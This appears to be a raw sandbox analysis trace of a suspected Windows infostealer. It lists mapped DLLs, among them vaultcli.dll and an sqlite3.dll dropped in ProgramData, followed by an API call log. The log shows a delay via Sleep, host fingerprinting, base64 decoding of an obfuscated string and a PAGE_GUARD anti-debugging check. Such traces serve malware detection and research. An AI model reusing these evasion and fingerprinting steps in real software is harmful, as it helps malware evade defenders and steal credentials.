= "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 614 start_va = 0x74a00000 end_va = 0x74a44fff monitored = 0 entry_point = 0x74a1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 615 start_va = 0x74a50000 end_va = 0x74b9efff monitored = 0 entry_point = 0x74b06820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 616 start_va = 0x755c0000 end_va = 0x75706fff monitored = 0 entry_point = 0x755d1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 617 start_va = 0x510000 end_va = 0x539fff monitored = 0 entry_point = 0x515680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 618 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 619 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 620 start_va = 0x74990000 end_va = 0x749bafff monitored = 0 entry_point = 0x74995680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 621 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 622 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 623 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 624 start_va = 0xad0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 625 start_va = 0x75a20000 end_va = 0x75a32fff monitored = 0 entry_point = 0x75a21d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 626 start_va = 0x74920000 end_va = 0x74925fff monitored = 0 entry_point = 0x74921460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 627 start_va = 0x73ae0000 end_va = 0x73afafff monitored = 0 entry_point = 0x73ae9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 628 start_va = 0x6d3d0000 end_va = 0x6d409fff monitored = 0 entry_point = 0x6d3e9be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 629 start_va = 0x73a10000 end_va = 0x73ad7fff monitored = 0 entry_point = 0x73a7ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 630 start_va = 0x75c30000 end_va = 0x7702efff monitored = 0 entry_point = 0x75deb990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 631 start_va = 0x749c0000 end_va = 0x749f6fff monitored = 0 entry_point = 0x749c3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 632 start_va = 0x74e60000 end_va = 0x75358fff monitored = 0 entry_point = 0x75067610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 633 start_va = 0x77030000 end_va = 0x7703bfff monitored = 0 entry_point = 0x77033930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 634 start_va = 0x75ba0000 end_va = 0x75c2cfff monitored = 0 entry_point = 0x75be9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 635 start_va = 0x745c0000 end_va = 0x74603fff monitored = 0 entry_point = 0x745c7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 636 start_va = 0x758b0000 end_va = 0x758befff monitored = 0 entry_point = 0x758b2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 637 start_va = 0x6abd0000 end_va = 0x6ad3afff monitored = 0 entry_point = 0x6ac3e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 638 start_va = 0x75360000 end_va = 0x7544afff monitored = 0 entry_point = 0x7539d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 639 start_va = 0x1ed0000 end_va = 0x1f60fff monitored = 0 entry_point = 0x1f08cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 640 start_va = 0x6d2f0000 end_va = 0x6d2f7fff monitored = 0 entry_point = 0x6d2f1c60 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 641 start_va = 0x1ed0000 end_va = 0x82cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 642 start_va = 0x719a0000 end_va = 0x71c6afff monitored = 0 entry_point = 0x71bdc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 643 start_va = 0x82d0000 end_va = 0x8606fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 644 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 645 start_va = 0x75b00000 end_va = 0x75b91fff monitored = 0 entry_point = 0x75b38cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 646 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 647 start_va = 0x73f10000 end_va = 0x73f6efff monitored = 0 entry_point = 0x73f14af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 648 start_va = 0x70020000 end_va = 0x70031fff monitored = 0 entry_point = 0x70024510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 649 start_va = 0x71820000 end_va = 0x7184efff monitored = 0 entry_point = 0x7182bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 650 start_va = 0x6ff80000 end_va = 0x7001afff monitored = 0 entry_point = 0x6ffbf7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 651 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 652 start_va = 0x8610000 end_va = 0x870ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008610000" filename = "" Region: id = 653 start_va = 0x77100000 end_va = 0x77106fff monitored = 0 entry_point = 0x77101e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 654 start_va = 0x71920000 end_va = 0x7196efff monitored = 0 entry_point = 0x7192d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 655 start_va = 0x6ff70000 end_va = 0x6ff77fff monitored = 0 entry_point = 0x6ff71fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 656 start_va = 0x71850000 end_va = 0x718d3fff monitored = 0 entry_point = 0x71876530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 657 start_va = 0x8710000 end_va = 0x874ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 658 start_va = 0x8750000 end_va = 0x884ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008750000" filename = "" Region: id = 659 start_va = 0x8850000 end_va = 0x888ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008850000" filename = "" Region: id = 660 start_va = 0x8890000 end_va = 0x898ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008890000" filename = "" Region: id = 661 start_va = 0x8990000 end_va = 0x89cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 662 start_va = 0x89d0000 end_va = 0x8acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089d0000" filename = "" Region: id = 663 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 664 start_va = 0x74ba0000 end_va = 0x74c23fff monitored = 0 entry_point = 0x74bc6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 817 start_va = 0x8ad0000 end_va = 0x8b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ad0000" filename = "" Region: id = 818 start_va = 0x8b10000 end_va = 0x8c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b10000" filename = "" Region: id = 819 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 820 start_va = 0x70260000 end_va = 0x703ddfff monitored = 0 entry_point = 0x702dc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 821 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 822 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 826 start_va = 0x8c10000 end_va = 0x8c12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 827 start_va = 0x8c20000 end_va = 0x8c27fff monitored = 0 entry_point = 0x8c219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 828 start_va = 0x8c30000 end_va = 0x8c30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 830 start_va = 0x8c20000 end_va = 0x8c27fff monitored = 0 entry_point = 0x8c219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 831 start_va = 0x8c30000 end_va = 0x8c30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 832 start_va = 0x8c20000 end_va = 0x8c27fff monitored = 0 entry_point = 0x8c219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 833 start_va = 0x8c30000 end_va = 0x8c30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 834 start_va = 0x8c20000 end_va = 0x8c27fff monitored = 0 entry_point = 0x8c219c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 835 start_va = 0x8c30000 end_va = 0x8c30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 836 start_va = 0x8c20000 end_va = 0x8c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c20000" filename = "" Region: id = 837 start_va = 0x8c60000 end_va = 0x8d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c60000" filename = "" Region: id = 838 start_va = 0x8d60000 end_va = 0x8d70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 839 start_va = 0x8d80000 end_va = 0x8e7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d80000" filename = "" Region: id = 840 start_va = 0x60900000 end_va = 0x60991fff monitored = 1 entry_point = 0x60901058 region_type = mapped_file name = "sqlite3.dll" filename = "\\ProgramData\\sqlite3.dll" (normalized: "c:\\programdata\\sqlite3.dll") Region: id = 841 start_va = 0x8e80000 end_va = 0x8f82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e80000" filename = "" Region: id = 842 start_va = 0x8f90000 end_va = 0x8f94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 843 start_va = 0x8fa0000 end_va = 0x8faffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 844 start_va = 0x8fb0000 end_va = 0x916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008fb0000" filename = "" Region: id = 845 start_va = 0x6fef0000 end_va = 0x6ff64fff monitored = 0 entry_point = 0x6ff29a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 846 start_va = 0x8fb0000 end_va = 0x912ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008fb0000" filename = "" Region: id = 847 start_va = 0x9160000 end_va = 0x916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009160000" filename = "" Region: id = 848 start_va = 0x8fb0000 end_va = 0x8feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008fb0000" filename = "" Region: id = 849 start_va = 0x8ff0000 end_va = 0x90effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ff0000" filename = "" Region: id = 850 start_va = 0x9120000 end_va = 0x912ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009120000" filename = "" Region: id = 851 start_va = 0x9170000 end_va = 0x91effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009170000" filename = "" Region: id = 852 start_va = 0x74c40000 end_va = 0x74d5efff monitored = 0 entry_point = 0x74c85980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 853 start_va = 0x91f0000 end_va = 0x96e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000091f0000" filename = "" Region: id = 854 start_va = 0x96f0000 end_va = 0x9be1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000096f0000" filename = "" Region: id = 855 start_va = 0x90f0000 end_va = 0x90f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090f0000" filename = "" Region: id = 856 start_va = 0x96f0000 end_va = 0x9bebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096f0000" filename = "" Region: id = 857 start_va = 0x68350000 end_va = 0x684c2fff monitored = 0 entry_point = 0x683fd220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 858 start_va = 0x9bf0000 end_va = 0x9ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bf0000" filename = "" Region: id = 859 start_va = 0x9cf0000 end_va = 0x9deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009cf0000" filename = "" Region: id = 860 start_va = 0x9df0000 end_va = 0xa5f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009df0000" filename = "" Region: id = 861 start_va = 0x8fb0000 end_va = 0x8feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008fb0000" filename = "" Region: id = 862 start_va = 0x8ff0000 end_va = 0x90effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ff0000" filename = "" Region: id = 863 start_va = 0x71dd0000 end_va = 0x71f1afff monitored = 0 entry_point = 0x71e31660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 864 start_va = 0x73d90000 end_va = 0x73e21fff monitored = 0 entry_point = 0x73dd0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 865 start_va = 0x9100000 end_va = 0x9100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009100000" filename = "" Region: id = 866 start_va = 0x6c960000 end_va = 0x6c9cffff monitored = 0 entry_point = 0x6c98d4e0 region_type = mapped_file name = "dlnashext.dll" filename = "\\Windows\\SysWOW64\\dlnashext.dll" (normalized: "c:\\windows\\syswow64\\dlnashext.dll") Region: id = 867 start_va = 0x6c750000 end_va = 0x6c7a6fff monitored = 0 entry_point = 0x6c797e90 region_type = mapped_file name = "playtodevice.dll" filename = "\\Windows\\SysWOW64\\PlayToDevice.dll" (normalized: "c:\\windows\\syswow64\\playtodevice.dll") Region: id = 868 start_va = 0x9130000 end_va = 0x916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009130000" filename = "" Region: id = 869 start_va = 0x96f0000 end_va = 0x97effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096f0000" filename = "" Region: id = 870 start_va = 0x97f0000 end_va = 0x982ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097f0000" filename = "" Region: id = 871 start_va = 0x9830000 end_va = 0x992ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009830000" filename = "" Region: id = 872 start_va = 0x71440000 end_va = 0x7145afff monitored = 0 entry_point = 0x714536d0 region_type = mapped_file name = "devdispitemprovider.dll" filename = "\\Windows\\SysWOW64\\DevDispItemProvider.dll" (normalized: "c:\\windows\\syswow64\\devdispitemprovider.dll") Region: id = 873 start_va = 0x72220000 end_va = 0x72274fff monitored = 0 entry_point = 0x72242ee0 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\SysWOW64\\MMDevAPI.dll" (normalized: "c:\\windows\\syswow64\\mmdevapi.dll") Region: id = 874 start_va = 0x71f20000 end_va = 0x71f41fff monitored = 0 entry_point = 0x71f291f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 875 start_va = 0x68160000 end_va = 0x68347fff monitored = 0 entry_point = 0x681e04c0 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\SysWOW64\\wpdshext.dll" (normalized: "c:\\windows\\syswow64\\wpdshext.dll") Region: id = 879 start_va = 0x9110000 end_va = 0x9111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009110000" filename = "" Region: id = 880 start_va = 0x73720000 end_va = 0x7393bfff monitored = 0 entry_point = 0x738ebc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 881 start_va = 0x9930000 end_va = 0x9933fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 882 start_va = 0x9940000 end_va = 0x9984fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 883 start_va = 0x9990000 end_va = 0x9993fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 884 start_va = 0x99a0000 end_va = 0x9a2dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 885 start_va = 0x9a30000 end_va = 0x9a40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 887 start_va = 0x9a50000 end_va = 0x9a53fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 888 start_va = 0x9a60000 end_va = 0x9a72fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db") Region: id = 889 start_va = 0x9a80000 end_va = 0x9a80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a80000" filename = "" Region: id = 908 start_va = 0x6d2e0000 end_va = 0x6d2ebfff monitored = 0 entry_point = 0x6d2e4ad0 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\SysWOW64\\pcacli.dll" (normalized: "c:\\windows\\syswow64\\pcacli.dll") Region: id = 909 start_va = 0x6c3d0000 end_va = 0x6c3e5fff monitored = 0 entry_point = 0x6c3d21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 7 os_tid = 0x4dc [0168.439] GetProcAddress (hModule=0x74610000, lpProcName="GetTickCount") returned 0x74635eb0 [0168.440] GetProcAddress (hModule=0x74610000, lpProcName="Sleep") returned 0x74627990 [0168.440] GetProcAddress (hModule=0x74610000, lpProcName="GetUserDefaultLangID") returned 0x7462ff30 [0168.440] GetProcAddress (hModule=0x74610000, lpProcName="CreateMutexA") returned 0x746366c0 [0168.440] GetProcAddress (hModule=0x74610000, lpProcName="GetLastError") returned 0x74623870 [0168.440] GetProcAddress (hModule=0x74610000, lpProcName="ExitProcess") returned 0x74637b30 [0168.440] GetProcAddress (hModule=0x74610000, lpProcName="HeapAlloc") returned 0x77142bd0 [0168.444] GetProcAddress (hModule=0x74610000, lpProcName="GetProcessHeap") returned 0x74627710 [0168.445] GetProcAddress (hModule=0x74610000, lpProcName="GetComputerNameA") returned 0x7462fbf0 [0168.445] GetProcAddress (hModule=0x74610000, lpProcName="VirtualProtect") returned 0x74627a50 [0168.445] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74380000 [0168.465] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x74740000 [0170.926] GetProcAddress (hModule=0x74380000, lpProcName="GetUserNameA") returned 0x743a2910 [0170.927] GetProcAddress (hModule=0x74740000, lpProcName="CryptStringToBinaryA") returned 0x7475d6d0 [0170.927] GetTickCount () returned 0x207d2f3 [0170.927] Sleep (dwMilliseconds=0x3a98) [0180.981] GetTickCount () returned 0x2080dca [0180.982] GetProcessHeap () returned 0x5b0000 [0180.982] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b7b68 [0180.983] GetComputerNameA (in: lpBuffer=0x5b7b68, nSize=0x19ff64 | out: lpBuffer="XC64ZB", nSize=0x19ff64) returned 1 [0180.989] GetUserDefaultLangID () returned 0x409 [0180.991] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x84 [0180.992] GetLastError () returned 0x0 [0180.995] CryptStringToBinaryA (in: pszString="LEHeEqLIVX4TbGamLZOcamFpeg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0180.996] CryptStringToBinaryA (in: pszString="LEHeEqLIVX4TbGamLZOcamFpeg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0180.996] GetProcessHeap () returned 0x5b0000 [0180.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5b7c78 [0180.996] VirtualProtect (in: lpAddress=0x5b7c78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0180.999] GetProcessHeap () returned 0x5b0000 [0180.999] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5b3fd0 